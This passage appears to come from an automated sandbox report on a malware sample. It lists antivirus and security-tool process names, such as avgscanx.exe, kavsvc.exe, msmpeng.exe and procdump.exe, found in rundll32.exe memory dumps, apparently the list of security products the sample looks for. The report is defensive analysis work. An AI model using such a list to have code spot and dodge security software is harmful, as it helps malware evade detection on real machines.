    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UmxAgent.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASHWEBSV.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521925258.0000025BF009A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCFManager.exe
    Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF016C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: K7RTScan.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSDFWD.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgscanx.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: aswUpdSv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kavsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SPIDERUI.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGEMC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: procdump.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avuser.exe
    Source: rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562924841.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487898021.0000025BF00EF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488163764.0000025BF00FF000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635423292.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562667761.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714281861.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639316878.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF0130000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pctsgui.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVZ.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461748687.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935104556.0000025BF00DE000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089047921.0000025BF00E8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: avgnsx.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSMA32.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashserv.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BULLGUARD.EXE
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A2SERVICE.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fprot.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3314134932.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KVSrvXP.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fsmb32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089140201.0000025BF012E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PavPrSrv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spiderui.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A2GUARD.EXE
    Source: rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563006653.0000025BF00D6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562791270.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kpfw32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qoeloader.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVKTray.exe
    Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FAMEH32.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVGTRAY.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spidernt.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EMLPROUI.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: spideragent.exe
